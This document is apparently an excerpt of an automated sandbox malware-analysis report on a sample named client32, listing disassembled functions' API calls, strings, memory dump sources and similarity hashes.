                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$AddressCurrentFreeLoadProcProcessVersion__strdup
                                                                                                                        • String ID: NSMWClass$NSMWClassVista
                                                                                                                        • API String ID: 319803333-889775840
                                                                                                                        • Opcode ID: 903a90e8a7d17424edb06c100f40dd41976d118595282118367260f60fabb7df
                                                                                                                        • Instruction ID: da22cb9b74e46dcd904e816c1cfbcb9dca7c1c5d087ee23a6b3981c0c6242146
                                                                                                                        • Opcode Fuzzy Hash: 903a90e8a7d17424edb06c100f40dd41976d118595282118367260f60fabb7df
                                                                                                                        • Instruction Fuzzy Hash: 2721D272E286855FD701CF688C407EAFBFAAB8A625F4086A9EC55C7780E736D805C750
                                                                                                                        APIs
                                                                                                                        • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 68596D0A
                                                                                                                        • GetProcAddress.KERNEL32(?,InternetReadFile), ref: 68596D72
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc
                                                                                                                        • String ID: InternetQueryDataAvailable$InternetReadFile
                                                                                                                        • API String ID: 190572456-1434219782
                                                                                                                        • Opcode ID: 2c204253761722dbc7d7418de179a381cdd13a73f75c27788b8c3b00b1a839d6
                                                                                                                        • Instruction ID: a5e8f972b3dcce074a48537eb0a5cac376a6e3a6f5b35571efd7441ef002afaf
                                                                                                                        • Opcode Fuzzy Hash: 2c204253761722dbc7d7418de179a381cdd13a73f75c27788b8c3b00b1a839d6
                                                                                                                        • Instruction Fuzzy Hash: 90214C759042A99FDF21DF54C890AE8B7F8FB48305F5144EAEAA9D7200D6705DC88F90
                                                                                                                        APIs
                                                                                                                        • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 68596C0F
                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 68596C2E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                        • String ID: *$InternetQueryOptionA
                                                                                                                        • API String ID: 199729137-4161725205
                                                                                                                        • Opcode ID: 20a399b860fb95d9bb7e1a4507e6a98136521fc49d136941037c38584fe4634b
                                                                                                                        • Instruction ID: 6c96144005bc7611b292c73416fcdca039c59d0aabfe828e2466442f1266e960
                                                                                                                        • Opcode Fuzzy Hash: 20a399b860fb95d9bb7e1a4507e6a98136521fc49d136941037c38584fe4634b
                                                                                                                        • Instruction Fuzzy Hash: 9B212C71900248DFCF51EF68D840AAEBBF4FB49311F51815AED56A7280D774AA44CFD4
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _strtok
                                                                                                                        • String ID: ,=
                                                                                                                        • API String ID: 1675499619-2677018336
                                                                                                                        • Opcode ID: d2de01c0851f5f09910fd20d88a83f3c74abcc9e5e0ac208d52fec541981aab0
                                                                                                                        • Instruction ID: feda1c23a4deb0c6415e8fc3f525424d3758ff44d9e037eb8c71fca6166ea7b8
                                                                                                                        • Opcode Fuzzy Hash: d2de01c0851f5f09910fd20d88a83f3c74abcc9e5e0ac208d52fec541981aab0
                                                                                                                        • Instruction Fuzzy Hash: 7111C266E0866B1FEB41CE699C11BCBB7D85F06259F04C0D5F95C9B341EA20F801C6E2
                                                                                                                        APIs
                                                                                                                        • _memmove.LIBCMT ref: 1114F04C
                                                                                                                        • _memmove.LIBCMT ref: 1114F086
                                                                                                                          • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                          • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                          • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove$ErrorExitLastMessageProcesswsprintf
                                                                                                                        • String ID: ..\ctl32\WCUNPACK.C$n > 128
                                                                                                                        • API String ID: 6605023-1396654219
                                                                                                                        • Opcode ID: 39d3c9d7fc05fd47aebaf31cf4e64413a64e5022646b21ebdd41d3a989af53bd
                                                                                                                        • Instruction ID: df32f2f24868e4b0a831f81203bc5965ced63257c83ed47365b8bb2cf1ea103c
                                                                                                                        • Opcode Fuzzy Hash: 39d3c9d7fc05fd47aebaf31cf4e64413a64e5022646b21ebdd41d3a989af53bd
                                                                                                                        • Instruction Fuzzy Hash: 37112976C0116677C3118E2D9D88E8BFF69EB81A68F248125FC9817741F731A61087E2
                                                                                                                        APIs
                                                                                                                        • std::exception::exception.LIBCMT ref: 685A0BA3
                                                                                                                          • Part of subcall function 685B400A: std::exception::_Copy_str.LIBCMT ref: 685B4025
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 685A0B94
                                                                                                                          • Part of subcall function 685B42DF: RaiseException.KERNEL32(?,?,6859439C,?,?,?,?,?,6859439C,?,685D6630,?,00000000), ref: 685B4321
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 685A0BB8
                                                                                                                          • Part of subcall function 685ADBD0: _malloc.LIBCMT ref: 685ADBE9
                                                                                                                          • Part of subcall function 685ADBD0: wsprintfA.USER32 ref: 685ADC04
                                                                                                                          • Part of subcall function 685ADBD0: _memset.LIBCMT ref: 685ADC27
                                                                                                                        • std::exception::exception.LIBCMT ref: 685A0C17
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 685A0C2C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw$std::exception::exception$Copy_strExceptionRaise_malloc_memsetstd::exception::_wsprintf
                                                                                                                        • String ID: 0f]h
                                                                                                                        • API String ID: 1502670295-3511245404
                                                                                                                        • Opcode ID: 7346744ed0bc83131fbe808a0fe3c5342ffe2bb87e652117084eec5973fff17c
                                                                                                                        • Instruction ID: 6b726e34dff55e0df6466e5311ff20041e31d35ec4128e82320a87a27a0ed636
                                                                                                                        • Opcode Fuzzy Hash: 7346744ed0bc83131fbe808a0fe3c5342ffe2bb87e652117084eec5973fff17c
                                                                                                                        • Instruction Fuzzy Hash: 291112B59002189BCB24DF99D8519AFFBF8EFE4204B50891EE95597200E7759904CFA1
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _memsetwsprintf
                                                                                                                        • String ID: %s_%d$Gateway_Name
                                                                                                                        • API String ID: 1984265443-207007254
                                                                                                                        • Opcode ID: 13079522d3d795d6b6cf418622cdba9acfe6fba55187ed9bb4c3510b0ee3c3a1
                                                                                                                        • Instruction ID: 4f4434e9e3fe9afe2b3cedd2fd6796d7aff20a0c9328d683038c16c0fcf2c37a
                                                                                                                        • Opcode Fuzzy Hash: 13079522d3d795d6b6cf418622cdba9acfe6fba55187ed9bb4c3510b0ee3c3a1
                                                                                                                        • Instruction Fuzzy Hash: FB01F2B5A40248EFDB10DB68DC51FBE77B8EB86604F804484FD169B245E631AE14C7AA
                                                                                                                        APIs
                                                                                                                        • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 110A9E1D
                                                                                                                          • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                          • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                          • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                        • String ID: ..\ctl32\liststat.cpp$..\ctl32\listview.cpp$m_hWnd
                                                                                                                        • API String ID: 819365019-2727927828
                                                                                                                        • Opcode ID: 9b6d80b7455542f82354b29f9862b6f032892670bc7ed0853ece567b39401bfb
                                                                                                                        • Instruction ID: e80c3d609587989e24333d1fa603ed55b2b214ac37036ff82e40f0e660cda7c6
                                                                                                                        • Opcode Fuzzy Hash: 9b6d80b7455542f82354b29f9862b6f032892670bc7ed0853ece567b39401bfb
                                                                                                                        • Instruction Fuzzy Hash: 6BF0F038B80325AFE321D681EC81FC5B2949B05B05F100828F2462B6D0EAA5B4C0C781
                                                                                                                        APIs
                                                                                                                        • GetDlgItem.USER32(?,?), ref: 1101D12F
                                                                                                                        • ShowWindow.USER32(00000000), ref: 1101D136
                                                                                                                          • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                          • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                          • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorExitItemLastMessageProcessShowWindowwsprintf
                                                                                                                        • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                                                                        • API String ID: 1319256379-1986719024
                                                                                                                        • Opcode ID: 5591af17a89e0ca7adab3af439ec82609681faf43d0b1edc9c864f49cd37c925
                                                                                                                        • Instruction ID: 4e2be1340c0eb87c864e4721684ff6510800268e2acfe58ec4bc6308307db221
                                                                                                                        • Opcode Fuzzy Hash: 5591af17a89e0ca7adab3af439ec82609681faf43d0b1edc9c864f49cd37c925
                                                                                                                        • Instruction Fuzzy Hash: 4AE0867A910329BFC310EE61DC89FDBF7ACDB45754F10C429FA2947200D674E94087A1
                                                                                                                        APIs
                                                                                                                        • GetDlgItem.USER32(?,?), ref: 1101D0DB
                                                                                                                        • EnableWindow.USER32(00000000,?), ref: 1101D0E6
                                                                                                                          • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                          • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                          • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: EnableErrorExitItemLastMessageProcessWindowwsprintf
                                                                                                                        • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                                                                        • API String ID: 1136984157-1986719024
                                                                                                                        • Opcode ID: 9b6c0fd9a44062357b394c58c00652d207fdc6b2e6a946a601fd6034372f8a5b
                                                                                                                        • Instruction ID: 2b1270b1ce6598f01739890776adf1a6d9f8641e6ea7dfdd3b9eef3de0244db5
                                                                                                                        • Opcode Fuzzy Hash: 9b6c0fd9a44062357b394c58c00652d207fdc6b2e6a946a601fd6034372f8a5b
                                                                                                                        • Instruction Fuzzy Hash: 45E02636A00329BFD310EAA1DC84F9BF3ACEB44360F00C429FA6583600CA31E84087A1
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2782032738-0
                                                                                                                        • Opcode ID: 08c01935fc771ded5e1dc1816cdb0982bbac6150f0b205de900957a3203d3a0a
                                                                                                                        • Instruction ID: ea3493c0fd7c255a111d49499dbcdc666525785bb7d3851377e371b56622ff65
                                                                                                                        • Opcode Fuzzy Hash: 08c01935fc771ded5e1dc1816cdb0982bbac6150f0b205de900957a3203d3a0a
                                                                                                                        • Instruction Fuzzy Hash: 9741C531A00B05DBDB15CFA9C8A469EBBB6FFE0364FA885ADD47697180D770DE418B40
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 685ADBD0: _malloc.LIBCMT ref: 685ADBE9
                                                                                                                          • Part of subcall function 685ADBD0: wsprintfA.USER32 ref: 685ADC04
                                                                                                                          • Part of subcall function 685ADBD0: _memset.LIBCMT ref: 685ADC27
                                                                                                                        • std::exception::exception.LIBCMT ref: 685AF9F9
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 685AFA0E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1338273076-0
                                                                                                                        • Opcode ID: 7e2876ccaa390735356246e316e5beff78fed1f3dddcbd100c0be918afea6180
                                                                                                                        • Instruction ID: 91075a17ab5724a97b05d96a0cd00169cd6862e353bad98375218521cef0cfac
                                                                                                                        • Opcode Fuzzy Hash: 7e2876ccaa390735356246e316e5beff78fed1f3dddcbd100c0be918afea6180
                                                                                                                        • Instruction Fuzzy Hash: 1231A2B9A04308ABC724DF58E8409ABF7F8EF98304F44856EE85A97740E771ED04CB95
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
